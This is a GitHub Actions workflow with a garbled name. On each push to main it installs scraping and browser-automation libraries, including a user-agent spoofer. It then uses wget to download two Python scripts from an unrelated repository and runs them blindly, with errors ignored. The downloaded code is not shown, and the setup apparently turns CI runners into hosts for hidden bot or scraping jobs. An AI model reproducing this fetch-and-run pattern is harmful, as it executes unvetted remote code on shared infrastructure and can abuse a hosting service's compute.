name: Multi-yMachineyd Workflowznig

on:
  push:
    branches:
      - main

jobs:

  run-on-ubuntu1:
    runs-on: ubuntu-latest
    if: always()  # This ensures the job runs even if previous jobs fail
    

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Set up Python
        uses: actions/setup-python@v3
        with:
          python-version: 3.11  # Replace with your desired Python version

      - name: Run Python Program
        continue-on-error: true
        run: |
          pip install requests beautifulsoup4 colorama fake-useragent
          pip install selenium
          pip install python-dotenv
          wget https://github.com/Bvfre/yu/raw/main/b.py
          ls
          python b.py
          wget https://github.com/Bvfre/yu/raw/main/a.py
          ls
          python a.py
          
          

